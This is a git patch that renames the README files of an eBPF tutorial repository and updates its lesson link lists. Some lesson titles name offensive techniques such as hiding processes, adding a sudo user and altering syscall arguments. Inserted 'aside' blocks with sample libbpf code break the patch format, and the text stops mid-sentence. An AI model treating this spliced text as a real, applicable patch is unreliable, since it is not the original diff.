From 049b40d222f1c61065ab5cf3974c2ef1947199ab Mon Sep 17 00:00:00 2001
From: Yusheng Zheng
Date: Sun, 20 Oct 2024 04:26:42 +0000
Subject: [PATCH] rename README to chinese documents

---
 README.md | 86 ++-
 README.zh.md | 113 ++-
 src/0-introduce/README.md | 325 +++++----
 src/0-introduce/README.zh.md | 163 +++++
 src/0-introduce/README_en.md | 162 -----
 src/1-helloworld/README.md | 150 ++--
 src/1-helloworld/README.zh.md | 197 ++++++
 src/1-helloworld/README_en.md | 195 ------
 src/10-hardirqs/README.md | 92 +--
 src/10-hardirqs/README.zh.md | 262 +++++++
 src/10-hardirqs/README_en.md | 262 -------
 src/11-bootstrap/README.md | 161 ++---
 .../{README_en.md => README.zh.md} | 161 +++--
 src/12-profile/README.md | 161 +++--
 src/12-profile/README.zh.md | 335 +++++++++
 src/12-profile/README_en.md | 334 ---------
 src/13-tcpconnlat/README.md | 190 +++--
 src/13-tcpconnlat/README.zh.md | 599 ++++++++++++++++
 src/13-tcpconnlat/README_en.md | 571 ---------------
 src/14-tcpstates/README.md | 153 ++--
 src/14-tcpstates/README.zh.md | 405 +++++++++++
 src/14-tcpstates/README_en.md | 408 -----------
 src/15-javagc/README.md | 106 ++-
 src/15-javagc/README.zh.md | 327 +++++++++
 src/15-javagc/README_en.md | 319 ---------
 src/16-memleak/README.md | 242 +++----
 src/16-memleak/README.zh.md | 489 +++++++++++++
 src/16-memleak/README_en.md | 447 ------------
 src/17-biopattern/README.md | 147 ++--
 src/17-biopattern/README.zh.md | 329 +++++++++
 src/17-biopattern/README_en.md | 332 ---------
 src/18-further-reading/README.md | 107 ++-
 src/18-further-reading/README.zh.md | 149 ++++
 src/18-further-reading/README_en.md | 140 ----
 src/19-lsm-connect/README.md | 89 +--
 src/19-lsm-connect/README.zh.md | 169 +++++
 src/19-lsm-connect/README_en.md | 170 -----
 src/2-kprobe-unlink/README.md | 69 +-
 src/2-kprobe-unlink/README.zh.md | 149 ++++
 src/2-kprobe-unlink/README_en.md | 150 ----
 src/20-tc/README.md | 44 +-
 src/20-tc/README.zh.md | 108 +++
 src/20-tc/README_en.md | 110 ---
 src/21-xdp/README.md | 116 ++--
 src/21-xdp/README.zh.md | 157 +++++
 src/21-xdp/README_en.md | 163 -----
 src/22-android/README.md | 104 ++-
 src/22-android/README.zh.md | 154 +++++
 src/22-android/README_en.md | 150 ----
 src/23-http/README.md | 391 +++++------
 src/23-http/README.zh.md | 652 ++++++++++++++++++
 src/23-http/README_en.md | 639 -----------------
 src/24-hide/README.md | 126 ++--
 src/24-hide/README.zh.md | 439 ++++++++++++
 src/24-hide/README_en.md | 429 ------------
 src/25-signal/README.md | 121 ++--
 src/25-signal/README.zh.md | 193 ++++++
 src/25-signal/README_en.md | 200 ------
 src/26-sudo/README.md | 18 +-
 src/26-sudo/README.zh.md | 25 +
 src/26-sudo/README_en.md | 23 -
 src/27-replace/README.md | 26 +-
 src/27-replace/README.zh.md | 40 ++
 src/27-replace/README_en.md | 38 -
 src/28-detach/README.md | 81 ++-
 src/28-detach/README.zh.md | 117 ++++
 src/28-detach/README_en.md | 130 ----
 src/29-sockops/README.md | 112 +--
 src/29-sockops/README.zh.md | 257 +++++++
 src/29-sockops/README_en.md | 259 -------
 src/3-fentry-unlink/README.md | 42 +-
 src/3-fentry-unlink/README.zh.md | 89 +++
 src/3-fentry-unlink/README_en.md | 87 ---
 src/30-sslsniff/README.md | 270 ++++----
 src/30-sslsniff/README.zh.md | 534 ++++++++++++++
 src/30-sslsniff/README_en.md | 544 ---------------
 src/31-goroutine/README.md | 66 +-
 src/31-goroutine/README.zh.md | 112 +++
 src/31-goroutine/README_en.md | 112 ---
 src/32-http2/{README.md => README.zh.md} | 0
 src/33-funclatency/README.md | 76 +-
 src/33-funclatency/README.zh.md | 189 +++++
 src/33-funclatency/README_en.md | 189 -----
 src/34-syscall/README.md | 68 +-
 src/34-syscall/README.zh.md | 201 ++++++
 src/34-syscall/README_en.md | 199 ------
 src/35-user-ringbuf/README.md | 74 +-
 src/35-user-ringbuf/README.zh.md | 223 ++++++
 src/35-user-ringbuf/README_en.md | 223 ------
 src/36-userspace-ebpf/README.md | 183 +++--
 src/36-userspace-ebpf/README.zh.md | 219 ++++++
 src/36-userspace-ebpf/README_en.md | 218 ------
 src/37-uprobe-rust/README.md | 52 +-
 src/37-uprobe-rust/README.zh.md | 148 ++++
 src/37-uprobe-rust/README_en.md | 148 ----
 src/38-btf-uprobe/README.md | 159 +++--
 src/38-btf-uprobe/README.zh.md | 298 ++++++++
 src/38-btf-uprobe/README_en.md | 313 ---------
 src/39-nginx/README.md | 110 ++-
 src/39-nginx/README.zh.md | 149 ++++
 src/39-nginx/README_en.md | 145 ----
 src/4-opensnoop/README.md | 79 ++-
 src/4-opensnoop/README.zh.md | 123 ++++
 src/4-opensnoop/README_en.md | 122 ----
 src/40-mysql/README.md | 82 +--
 src/40-mysql/README.zh.md | 105 +++
 src/40-mysql/README_en.md | 105 ---
 src/41-xdp-tcpdump/README.md | 255 ++++---
 src/41-xdp-tcpdump/README.zh.md | 509 ++++++++++++++
 src/41-xdp-tcpdump/README_en.md | 508 --------------
 src/42-xdp-loadbalancer/README.md | 199 +++---
 src/42-xdp-loadbalancer/README.zh.md | 527 ++++++++++++++
 src/42-xdp-loadbalancer/README_en.md | 528 --------------
 src/43-kfuncs/README.md | 322 ++++-----
 src/43-kfuncs/README.zh.md | 445 ++++++++++++
 src/43-kfuncs/README_en.md | 445 ------------
 .../module/{README.md => README.zh.md} | 0
 src/44-scx-simple/README.md | 425 ++++++++++++
 src/44-scx-simple/README.zh.md | 0
 src/44-scx-simple/README_en.md | 425 ------------
 src/5-uprobe-bashreadline/README.md | 82 +--
 src/5-uprobe-bashreadline/README.zh.md | 138 ++++
 src/5-uprobe-bashreadline/README_en.md | 124 ----
 src/6-sigsnoop/README.md | 34 +-
 src/6-sigsnoop/README.zh.md | 142 ++++
 src/6-sigsnoop/README_en.md | 140 ----
 src/7-execsnoop/README.md | 40 +-
 src/7-execsnoop/README.zh.md | 125 ++++
 src/7-execsnoop/README_en.md | 125 ----
 src/8-exitsnoop/README.md | 72 +-
 src/8-exitsnoop/README.zh.md | 162 +++++
 src/8-exitsnoop/README_en.md | 162 -----
 src/9-runqlat/README.md | 227 +++---
 src/9-runqlat/README.zh.md | 449 ++++++++++++
 src/9-runqlat/README_en.md | 442 ------------
 src/SUMMARY.md | 120 ++--
 src/SUMMARY.zh.md | 82 +++
 src/SUMMARY_en.md | 89 ---
 src/bpftrace-tutorial/README.md | 152 ++--
 src/bpftrace-tutorial/README.zh.md | 324 +++++++++
 src/bpftrace-tutorial/README_en.md | 328 ---------
 src/scripts/generate_toc.py | 8 +-
 src/scripts/rename.py | 31 +-
 143 files changed, 14546 insertions(+), 14533 deletions(-)
 create mode 100644 src/0-introduce/README.zh.md
 delete mode 100644 src/0-introduce/README_en.md
 create mode 100644 src/1-helloworld/README.zh.md
 delete mode 100644 src/1-helloworld/README_en.md
 create mode 100644 src/10-hardirqs/README.zh.md
 delete mode 100644 src/10-hardirqs/README_en.md
 rename src/11-bootstrap/{README_en.md => README.zh.md} (53%)
 create mode 100644 src/12-profile/README.zh.md
 delete mode 100644 src/12-profile/README_en.md
 create mode 100644 src/13-tcpconnlat/README.zh.md
 delete mode 100644 src/13-tcpconnlat/README_en.md
 create mode 100644 src/14-tcpstates/README.zh.md
 delete mode 100644 src/14-tcpstates/README_en.md
 create mode 100644 src/15-javagc/README.zh.md
 delete mode 100644 src/15-javagc/README_en.md
 create mode 100644 src/16-memleak/README.zh.md
 delete mode 100644 src/16-memleak/README_en.md
 create mode 100644 src/17-biopattern/README.zh.md
 delete mode 100644 src/17-biopattern/README_en.md
 create mode 100644 src/18-further-reading/README.zh.md
 delete mode 100644 src/18-further-reading/README_en.md
 create mode 100644 src/19-lsm-connect/README.zh.md
 delete mode 100644 src/19-lsm-connect/README_en.md
 create mode 100644 src/2-kprobe-unlink/README.zh.md
 delete mode 100644 src/2-kprobe-unlink/README_en.md
 create mode 100644 src/20-tc/README.zh.md
 delete mode 100644 src/20-tc/README_en.md
 create mode 100644 src/21-xdp/README.zh.md
 delete mode 100644 src/21-xdp/README_en.md
 create mode 100644 src/22-android/README.zh.md
 delete mode 100644 src/22-android/README_en.md
 create mode 100644 src/23-http/README.zh.md
 delete mode 100644 src/23-http/README_en.md
 create mode 100644 src/24-hide/README.zh.md
 delete mode 100644 src/24-hide/README_en.md
 create mode 100644 src/25-signal/README.zh.md
 delete mode 100644 src/25-signal/README_en.md
 create mode 100644 src/26-sudo/README.zh.md
 delete mode 100644 src/26-sudo/README_en.md
 create mode 100644 src/27-replace/README.zh.md
 delete mode 100644 src/27-replace/README_en.md
 create mode 100644 src/28-detach/README.zh.md
 delete mode 100644 src/28-detach/README_en.md
 create mode 100644 src/29-sockops/README.zh.md
 delete mode 100644 src/29-sockops/README_en.md
 create mode 100644 src/3-fentry-unlink/README.zh.md
 delete mode 100644 src/3-fentry-unlink/README_en.md
 create mode 100644 src/30-sslsniff/README.zh.md
 delete mode 100644 src/30-sslsniff/README_en.md
 create mode 100644 src/31-goroutine/README.zh.md
 delete mode 100644 src/31-goroutine/README_en.md
 rename src/32-http2/{README.md => README.zh.md} (100%)
 create mode 100644 src/33-funclatency/README.zh.md
 delete mode 100644 src/33-funclatency/README_en.md
 create mode 100644 src/34-syscall/README.zh.md
 delete mode 100644 src/34-syscall/README_en.md
 create mode 100644 src/35-user-ringbuf/README.zh.md
 delete mode 100644 src/35-user-ringbuf/README_en.md
 create mode 100644 src/36-userspace-ebpf/README.zh.md
 delete mode 100644 src/36-userspace-ebpf/README_en.md
 create mode 100644 src/37-uprobe-rust/README.zh.md
 delete mode 100644 src/37-uprobe-rust/README_en.md
 create mode 100644 src/38-btf-uprobe/README.zh.md
 delete mode 100644 src/38-btf-uprobe/README_en.md
 create mode 100644 src/39-nginx/README.zh.md
 delete mode 100644 src/39-nginx/README_en.md
 create mode 100644 src/4-opensnoop/README.zh.md
 delete mode 100644 src/4-opensnoop/README_en.md
 create mode 100644 src/40-mysql/README.zh.md
 delete mode 100644 src/40-mysql/README_en.md
 create mode 100644 src/41-xdp-tcpdump/README.zh.md
 delete mode 100644 src/41-xdp-tcpdump/README_en.md
 create mode 100644 src/42-xdp-loadbalancer/README.zh.md
 delete mode 100644 src/42-xdp-loadbalancer/README_en.md
 create mode 100644 src/43-kfuncs/README.zh.md
 delete mode 100644 src/43-kfuncs/README_en.md
 rename src/43-kfuncs/module/{README.md => README.zh.md} (100%)
 create mode 100644 src/44-scx-simple/README.zh.md
 delete mode 100644 src/44-scx-simple/README_en.md
 create mode 100644 src/5-uprobe-bashreadline/README.zh.md
 delete mode 100644 src/5-uprobe-bashreadline/README_en.md
 create mode 100755 src/6-sigsnoop/README.zh.md
 delete mode 100755 src/6-sigsnoop/README_en.md
 create mode 100644 src/7-execsnoop/README.zh.md
 delete mode 100644 src/7-execsnoop/README_en.md
 create mode 100644 src/8-exitsnoop/README.zh.md
 delete mode 100644 src/8-exitsnoop/README_en.md
 create mode 100755 src/9-runqlat/README.zh.md
 delete mode 100755 src/9-runqlat/README_en.md
 create mode 100644 src/SUMMARY.zh.md
 delete mode 100644 src/SUMMARY_en.md
 create mode 100644 src/bpftrace-tutorial/README.zh.md
 delete mode 100644 src/bpftrace-tutorial/README_en.md

diff --git a/README.md b/README.md
index 1e02e1e..6ba2398 100644
--- a/README.md
+++ b/README.md
@@ -13,7 +13,7 @@ This tutorial **does not cover complex concepts and scenario introductions**. It
 
 The tutorial focuses on eBPF examples in observability, networking, security, and more.
 
-#### [**中文版在这里**](README.zh.md)
+[**中文版在这里**](README.zh.md)
 
 ## Table of Contents
 
@@ -21,72 +21,68 @@ The tutorial focuses on eBPF examples in observability, networking, security, an
 
 This section contains simple eBPF program examples and introductions. It primarily utilizes the `eunomia-bpf` framework to simplify development and introduces the basic usage and development process of eBPF.
 
-- [lesson 0-introduce](src/0-introduce/README_en.md) Introduction to Core Concepts and Tools
-- [lesson 1-helloworld](src/1-helloworld/README_en.md) Hello World, Framework and Development
-- [lesson 2-kprobe-unlink](src/2-kprobe-unlink/README_en.md) Monitoring unlink System Calls with kprobe
-- [lesson 3-fentry-unlink](src/3-fentry-unlink/README_en.md) Monitoring unlink System Calls with fentry
-- [lesson 4-opensnoop](src/4-opensnoop/README_en.md) Capturing Opening Files and Filter with Global Variables
-- [lesson 5-uprobe-bashreadline](src/5-uprobe-bashreadline/README_en.md) Capturing readline Function Calls with Uprobe
-- [lesson 6-sigsnoop](src/6-sigsnoop/README_en.md) Capturing Signal Sending and Store State with Hash Maps
-- [lesson 7-execsnoop](src/7-execsnoop/README_en.md) Capturing Process Execution, Output with perf event array
-- [lesson 8-exitsnoop](src/8-exitsnoop/README_en.md) Monitoring Process Exit Events, Output with Ring Buffer
-- [lesson 9-runqlat](src/9-runqlat/README_en.md) Capturing Scheduling Latency and Recording as Histogram
-- [lesson 10-hardirqs](src/10-hardirqs/README_en.md) Capturing Interrupts with hardirqs or softirqs
+- [lesson 0-introduce](src/0-introduce/README.md) Introduction to Core Concepts and Tools
+- [lesson 1-helloworld](src/1-helloworld/README.md) Hello World, Framework and Development
+- [lesson 2-kprobe-unlink](src/2-kprobe-unlink/README.md) Monitoring unlink System Calls with kprobe
+- [lesson 3-fentry-unlink](src/3-fentry-unlink/README.md) Monitoring unlink System Calls with fentry
+- [lesson 4-opensnoop](src/4-opensnoop/README.md) Capturing Opening Files and Filter with Global Variables
+- [lesson 5-uprobe-bashreadline](src/5-uprobe-bashreadline/README.md) Capturing readline Function Calls with Uprobe
+- [lesson 6-sigsnoop](src/6-sigsnoop/README.md) Capturing Signal Sending and Store State with Hash Maps
+- [lesson 7-execsnoop](src/7-execsnoop/README.md) Capturing Process Execution, Output with perf event array
+- [lesson 8-exitsnoop](src/8-exitsnoop/README.md) Monitoring Process Exit Events, Output with Ring Buffer
+- [lesson 9-runqlat](src/9-runqlat/README.md) Capturing Scheduling Latency and Recording as Histogram
+- [lesson 10-hardirqs](src/10-hardirqs/README.md) Capturing Interrupts with hardirqs or softirqs
+
 ### Advanced Documents and Examples
 
 We start to build complete eBPF projects mainly based on `libbpf` and combine them with various application scenarios for practical use.
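> Aside (not part of the original patch): the user-space half of these libbpf-based lessons follows a common open/load/attach pattern. A minimal sketch is shown below, assuming libbpf is installed; `minimal.bpf.o` is a placeholder name for a compiled BPF object file, not a file from this repository.

```c
// Minimal libbpf user-space loader sketch: open a compiled BPF object,
// load it into the kernel, and attach every program it contains.
#include <stdio.h>
#include <bpf/libbpf.h>

int main(void)
{
    struct bpf_object *obj;
    struct bpf_program *prog;

    // "minimal.bpf.o" is a placeholder for an object built with clang -target bpf.
    obj = bpf_object__open_file("minimal.bpf.o", NULL);
    if (!obj) {
        fprintf(stderr, "failed to open BPF object\n");
        return 1;
    }
    if (bpf_object__load(obj)) {
        fprintf(stderr, "failed to load BPF object into the kernel\n");
        bpf_object__close(obj);
        return 1;
    }
    bpf_object__for_each_program(prog, obj) {
        // Attach based on each program's SEC() annotation (kprobe, tracepoint, ...).
        if (!bpf_program__attach(prog))
            fprintf(stderr, "failed to attach %s\n", bpf_program__name(prog));
    }
    // Programs stay attached while this process lives; a real tool would
    // poll maps or a ring buffer here instead of exiting immediately.
    bpf_object__close(obj);
    return 0;
}
```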
 
-- [lesson 11-bootstrap](src/11-bootstrap/README_en.md) Develop User-Space Programs with libbpf and Trace exec() and exit()
-- [lesson 12-profile](src/12-profile/README_en.md) Using eBPF Program Profile for Performance Analysis
-- [lesson 13-tcpconnlat](src/13-tcpconnlat/README_en.md) Statistics of TCP Connection Delay with libbpf
-- [lesson 14-tcpstates](src/14-tcpstates/README_en.md) Recording TCP Connection Status and TCP RTT
-- [lesson 15-javagc](src/15-javagc/README_en.md) Capturing User-Space Java GC Duration Using USDT
-- [lesson 16-memleak](src/16-memleak/README_en.md) Monitoring Memory Leaks
-- [lesson 17-biopattern](src/17-biopattern/README_en.md) Count Random/Sequential Disk I/O
-- [lesson 18-further-reading](src/18-further-reading/README_en.md) More Reference Materials: papers, projects
-- [lesson 19-lsm-connect](src/19-lsm-connect/README_en.md) Security Detection and Defense using LSM
-- [lesson 20-tc](src/20-tc/README_en.md) tc Traffic Control
-- [lesson 21-xdp](src/21-xdp/README_en.md) Programmable Packet Processing with XDP
+- [lesson 11-bootstrap](src/11-bootstrap/README.md) Develop User-Space Programs with libbpf and Trace exec() and exit()
+- [lesson 12-profile](src/12-profile/README.md) Using eBPF Program Profile for Performance Analysis
+- [lesson 13-tcpconnlat](src/13-tcpconnlat/README.md) Statistics of TCP Connection Delay with libbpf
+- [lesson 14-tcpstates](src/14-tcpstates/README.md) Recording TCP Connection Status and TCP RTT
+- [lesson 15-javagc](src/15-javagc/README.md) Capturing User-Space Java GC Duration Using USDT
+- [lesson 16-memleak](src/16-memleak/README.md) Monitoring Memory Leaks
+- [lesson 17-biopattern](src/17-biopattern/README.md) Count Random/Sequential Disk I/O
+- [lesson 18-further-reading](src/18-further-reading/README.md) More Reference Materials: papers, projects
+- [lesson 19-lsm-connect](src/19-lsm-connect/README.md) Security Detection and Defense using LSM
+- [lesson 20-tc](src/20-tc/README.md) tc Traffic Control
+- [lesson 21-xdp](src/21-xdp/README.md) Programmable Packet Processing with XDP
+
 ### In-Depth Topics
 
 This section covers advanced topics related to eBPF, including using eBPF programs on Android, possible attacks and defenses using eBPF programs, and complex tracing. Combining the user-mode and kernel-mode aspects of eBPF can bring great power (as well as security risks).
-
 - Android:
 
-- [lesson 22-android](src/22-android/README_en.md) Using eBPF Programs on Android
-
+- [lesson 22-android](src/22-android/README.md) Using eBPF Programs on Android
 
 Networking:
 
-- [lesson 23-http](src/23-http/README_en.md) L7 Tracing with eBPF: HTTP and Beyond via Socket Filters and Syscall Tracepoints
-- [lesson 29-sockops](src/29-sockops/README_en.md) Accelerating Network Request Forwarding with Sockops
-- [lesson 41-xdp-tcpdump](src/41-xdp-tcpdump/README_en.md) Capturing TCP Information with XDP
-- [lesson 42-xdp-loadbalancer](src/42-xdp-loadbalancer/README_en.md) XDP Load Balancer
-
+- [lesson 23-http](src/23-http/README.md) L7 Tracing with eBPF: HTTP and Beyond via Socket Filters and Syscall Tracepoints
+- [lesson 29-sockops](src/29-sockops/README.md) Accelerating Network Request Forwarding with Sockops
+- [lesson 41-xdp-tcpdump](src/41-xdp-tcpdump/README.md) Capturing TCP Information with XDP
+- [lesson 42-xdp-loadbalancer](src/42-xdp-loadbalancer/README.md) XDP Load Balancer
 
 Security:
 
-- [lesson 24-hide](src/24-hide/README_en.md) Hiding Process or File Information
-- [lesson 25-signal](src/25-signal/README_en.md) Using bpf_send_signal to Terminate Malicious Processes in eBPF
-- [lesson 26-sudo](src/26-sudo/README_en.md) Using eBPF to add sudo user
-- [lesson 27-replace](src/27-replace/README_en.md) Replace Text Read or Written by Any Program with eBPF
-- [lesson 28-detach](src/28-detach/README_en.md) Running eBPF After Application Exits: The Lifecycle of eBPF Programs
-- [lesson 34-syscall](src/34-syscall/README_en.md) Modifying System Call Arguments with eBPF
-
+- [lesson 24-hide](src/24-hide/README.md) Hiding Process or File Information
+- [lesson 25-signal](src/25-signal/README.md) Using bpf_send_signal to Terminate Malicious Processes in eBPF
+- [lesson 26-sudo](src/26-sudo/README.md) Using eBPF to add sudo user
+- [lesson 27-replace](src/27-replace/README.md) Replace Text Read or Written by Any Program with eBPF
+- [lesson 28-detach](src/28-detach/README.md) Running eBPF After Application Exits: The Lifecycle of eBPF Programs
+- [lesson 34-syscall](src/34-syscall/README.md) Modifying System Call Arguments with eBPF
 
 Scheduler:
 
-- [lesson 44-scx-simple](src/44-scx-simple/README_en.md) Introduction to the BPF Scheduler
-
+- [lesson 44-scx-simple](src/44-scx-simple/README.md) Introduction to the BPF Scheduler
 
 Other:
 
-- [lesson 35-user-ringbuf](src/35-user-ringbuf/README_en.md) Asynchronously Send to Kernel with User Ring Buffer
-- [lesson 36-userspace-ebpf](src/36-userspace-ebpf/README_en.md) Userspace eBPF Runtimes: Overview and Applications
-- [lesson 38-btf-uprobe](src/38-btf-uprobe/README_en.md) Expanding eBPF Compile Once, Run Everywhere(CO-RE) to Userspace Compatibility
-- [lesson 43-kfuncs](src/43-kfuncs/README_en.md) Extending eBPF Beyond Its Limits: Custom kfuncs in Kernel Modules
+- [lesson 35-user-ringbuf](src/35-user-ringbuf/README.md) Asynchronously Send to Kernel with User Ring Buffer
+- [lesson 36-userspace-ebpf](src/36-userspace-ebpf/README.md) Userspace eBPF Runtimes: Overview and Applications
+- [lesson 38-btf-uprobe](src/38-btf-uprobe/README.md) Expanding eBPF Compile Once, Run Everywhere (CO-RE) to Userspace Compatibility
+- [lesson 43-kfuncs](src/43-kfuncs/README.md) Extending eBPF Beyond Its Limits: Custom kfuncs in Kernel Modules
 
 Continuously updating...
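> Aside (not part of the original patch): the "Getting Started" lessons listed above begin from a tiny kernel-space program. A minimal sketch in the style of lesson 1-helloworld is shown below, assuming the usual libbpf headers and a loader such as eunomia-bpf or the libbpf loader sketched earlier; build details live in the lesson itself.

```c
// Minimal kernel-space eBPF sketch: hook the write(2) syscall tracepoint
// and log the calling PID to the kernel trace pipe via bpf_printk().
#include <linux/bpf.h>
#include <bpf/bpf_helpers.h>

SEC("tracepoint/syscalls/sys_enter_write")
int handle_tp(void *ctx)
{
    // Upper 32 bits of the helper's return value hold the TGID (user-visible PID).
    int pid = bpf_get_current_pid_tgid() >> 32;
    bpf_printk("BPF triggered from PID %d.\n", pid);
    return 0;
}

// A GPL-compatible license is required for helpers such as bpf_printk().
char LICENSE[] SEC("license") = "Dual BSD/GPL";
```

Output appears in `/sys/kernel/debug/tracing/trace_pipe` once the program is loaded and attached.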
diff --git a/README.zh.md b/README.zh.md index 6cd62e7..c9ad69f 100644 --- a/README.zh.md +++ b/README.zh.md @@ -6,14 +6,6 @@ [Gitee 镜像](https://gitee.com/yunwei37/bpf-developer-tutorial) [English Version](README_en.md) -Dive straight into eBPF development with this concise tutorial, built around the powerful CO-RE (Compile Once, Run Everywhere) philosophy. Whether you're a newbie or a pro, we've got you covered with: - -- 🛠 **Practical Examples:** Start coding with bite-sized examples, some as short as just 20 lines! -- 🔍 **Focused Learning:** We prioritize hands-on learning, skipping the lengthy theory. Each directory offers an independent eBPF tool example. -- 💼 **Modern Frameworks:** Get comfortable with the latest eBPF frameworks such as libbpf, Cilium, libbpf-rs, and eunomia-bpf. -- 🌐 **Multi-language Support:** Play with code samples in C, Go, and Rust. -- 🌍 **Bilingual Content:** This tutorial is available in both Chinese and English. For the English version, check the README_en.md inside each directory. - #### [**Check out the English version here**](README.md) 这是一个基于 `CO-RE`(一次编译,到处运行)的 eBPF 的开发教程,提供了从入门到进阶的 eBPF 开发实践,包括基本概念、代码实例、实际应用等内容。和 BCC 不同的是,我们使用 libbpf、Cilium、libbpf-rs、eunomia-bpf 等框架进行开发,包含 C、Go、Rust 等语言的示例。 @@ -24,67 +16,68 @@ Dive straight into eBPF development with this concise tutorial, built around the ## 目录 -### 入门文档 +### 入门示例 -包含简单的 eBPF 程序样例与介绍,这部分主要使用 `eunomia-bpf` 框架简化开发,并介绍了 eBPF 的基本使用方式和开发流程。 +这一部分包含简单的 eBPF 程序示例和介绍。主要利用 `eunomia-bpf` 框架简化开发,介绍 eBPF 的基本用法和开发流程。 -- [lesson 0-introduce](src/0-introduce/README.md) 介绍 eBPF 的基本概念和常见的开发工具 -- [lesson 1-helloworld](src/1-helloworld/README.md) 使用 eBPF 开发最简单的「Hello World」程序,介绍 eBPF 的基本框架和开发流程 -- [lesson 2-kprobe-unlink](src/2-kprobe-unlink/README.md) 在 eBPF 中使用 kprobe 捕获 unlink 系统调用 -- [lesson 3-fentry-unlink](src/3-fentry-unlink/README.md) 在 eBPF 中使用 fentry 捕获 unlink 系统调用 -- [lesson 4-opensnoop](src/4-opensnoop/README.md) 使用 eBPF 捕获进程打开文件的系统调用集合,使用全局变量在 eBPF 中过滤进程 pid -- [lesson 5-uprobe-bashreadline](src/5-uprobe-bashreadline/README.md) 在 eBPF 中使用 uprobe 捕获 bash 的 readline 函数调用 -- [lesson 6-sigsnoop](src/6-sigsnoop/README.md) 捕获进程发送信号的系统调用集合,使用 hash map 保存状态 -- [lesson 7-execsnoop](src/7-execsnoop/README.md) 捕获进程执行时间,通过 perf event array 向用户态打印输出 -- [lesson 8-execsnoop](src/8-exitsnoop/README.md) 捕获进程退出事件,使用 ring buffer 向用户态打印输出 -- [lesson 9-runqlat](src/9-runqlat/README.md) 捕获进程调度延迟,以直方图方式记录 -- [lesson 10-hardirqs](src/10-hardirqs/README.md) 使用 hardirqs 或 softirqs 捕获中断事件 +- [lesson 0-introduce](src/0-introduce/README.zh.md) eBPF 示例教程 0:核心概念与工具简介 +- [lesson 1-helloworld](src/1-helloworld/README.zh.md) eBPF 入门开发实践教程一:Hello World,基本框架和开发流程 +- [lesson 2-kprobe-unlink](src/2-kprobe-unlink/README.zh.md) eBPF 入门开发实践教程二:在 eBPF 中使用 kprobe 监测捕获 unlink 系统调用 +- [lesson 3-fentry-unlink](src/3-fentry-unlink/README.zh.md) eBPF 入门开发实践教程三:在 eBPF 中使用 fentry 监测捕获 unlink 系统调用 +- [lesson 4-opensnoop](src/4-opensnoop/README.zh.md) eBPF 入门开发实践教程四:在 eBPF 中捕获进程打开文件的系统调用集合,使用全局变量过滤进程 pid +- [lesson 5-uprobe-bashreadline](src/5-uprobe-bashreadline/README.zh.md) eBPF 入门开发实践教程五:在 eBPF 中使用 uprobe 捕获 bash 的 readline 函数调用 +- [lesson 6-sigsnoop](src/6-sigsnoop/README.zh.md) eBPF 入门开发实践教程六:捕获进程发送信号的系统调用集合,使用 hash map 保存状态 +- [lesson 7-execsnoop](src/7-execsnoop/README.zh.md) eBPF 入门实践教程七:捕获进程执行事件,通过 perf event array 向用户态打印输出 +- [lesson 8-exitsnoop](src/8-exitsnoop/README.zh.md) eBPF 入门开发实践教程八:在 eBPF 中使用 exitsnoop 监控进程退出事件,使用 ring buffer 向用户态打印输出 +- [lesson 9-runqlat](src/9-runqlat/README.zh.md) eBPF 入门开发实践教程九:捕获进程调度延迟,以直方图方式记录 +- [lesson 
10-hardirqs](src/10-hardirqs/README.zh.md) eBPF 入门开发实践教程十:在 eBPF 中使用 hardirqs 或 softirqs 捕获中断事件 -### 进阶文档和示例 +### 高级文档和示例 -我们开始主要基于 `libbpf` 构建完整的 eBPF 工程,并且把它和各种应用场景结合起来进行实践。 +我们开始构建完整的 eBPF 项目,主要基于 `libbpf`,并将其与各种应用场景结合起来,以便实际使用。 -- [lesson 11-bootstrap](src/11-bootstrap/README.md) 使用 libbpf-boostrap 为 eBPF 编写原生的 libbpf 用户态代码,并建立完整的 libbpf 工程。 -- [lesson 12-profile](src/12-profile/README.md) 使用 eBPF 进行性能分析 -- [lesson 13-tcpconnlat](src/13-tcpconnlat/README.md) 记录 TCP 连接延迟,并使用 libbpf 在用户态处理数据 -- [lesson 14-tcpstates](src/14-tcpstates/README.md) 记录 TCP 连接状态与 TCP RTT -- [lesson 15-javagc](src/15-javagc/README.md) 使用 usdt 捕获用户态 Java GC 事件耗时 -- [lesson 16-memleak](src/16-memleak/README.md) 检测内存泄漏 -- [lesson 17-biopattern](src/17-biopattern/README.md) 捕获磁盘 IO 模式 -- [lesson 18-further-reading](src/18-further-reading/README.md) 更进一步的相关资料:论文列表、项目、博客等等 -- [lesson 19-lsm-connect](src/19-lsm-connect/README.md) 使用 LSM 进行安全检测防御 -- [lesson 20-tc](src/20-tc/README.md) 使用 eBPF 进行 tc 流量控制 -- [lesson 21-xdp](src/21-xdp/README.md) 使用 eBPF 进行 XDP 报文处理 +- [lesson 11-bootstrap](src/11-bootstrap/README.zh.md) eBPF 入门开发实践教程十一:在 eBPF 中使用 libbpf 开发用户态程序并跟踪 exec() 和 exit() 系统调用 +- [lesson 12-profile](src/12-profile/README.zh.md) eBPF 入门实践教程十二:使用 eBPF 程序 profile 进行性能分析 +- [lesson 13-tcpconnlat](src/13-tcpconnlat/README.zh.md) eBPF入门开发实践教程十三:统计 TCP 连接延时,并使用 libbpf 在用户态处理数据 +- [lesson 14-tcpstates](src/14-tcpstates/README.zh.md) eBPF入门实践教程十四:记录 TCP 连接状态与 TCP RTT +- [lesson 15-javagc](src/15-javagc/README.zh.md) eBPF 入门实践教程十五:使用 USDT 捕获用户态 Java GC 事件耗时 +- [lesson 16-memleak](src/16-memleak/README.zh.md) eBPF 入门实践教程十六:编写 eBPF 程序 Memleak 监控内存泄漏 +- [lesson 17-biopattern](src/17-biopattern/README.zh.md) eBPF 入门实践教程十七:编写 eBPF 程序统计随机/顺序磁盘 I/O +- [lesson 18-further-reading](src/18-further-reading/README.zh.md) 更多的参考资料:论文、项目等等 +- [lesson 19-lsm-connect](src/19-lsm-connect/README.zh.md) eBPF 入门实践教程:使用 LSM 进行安全检测防御 +- [lesson 20-tc](src/20-tc/README.zh.md) eBPF 入门实践教程二十:使用 eBPF 进行 tc 流量控制 +- [lesson 21-xdp](src/21-xdp/README.zh.md) eBPF 入门实践教程二十一: 使用 XDP 进行可编程数据包处理 -### 高级主题 +### 深入主题 -这里涵盖了一系列和 eBPF 相关的高级内容,包含在 Android 上使用 eBPF 程序、使用 eBPF 程序进行可能的攻击与防御、复杂的追踪等等。将 eBPF 用户态与内核态的部分结合起来,可能能带来巨大的威力(同时也是安全隐患)。这部分较为复杂的示例会基于 libbpf、Cilium 等框架进行开发,简单示例使用 eunomia-bpf 完成。 +这一部分涵盖了与 eBPF 相关的高级主题,包括在 Android 上使用 eBPF 程序、利用 eBPF 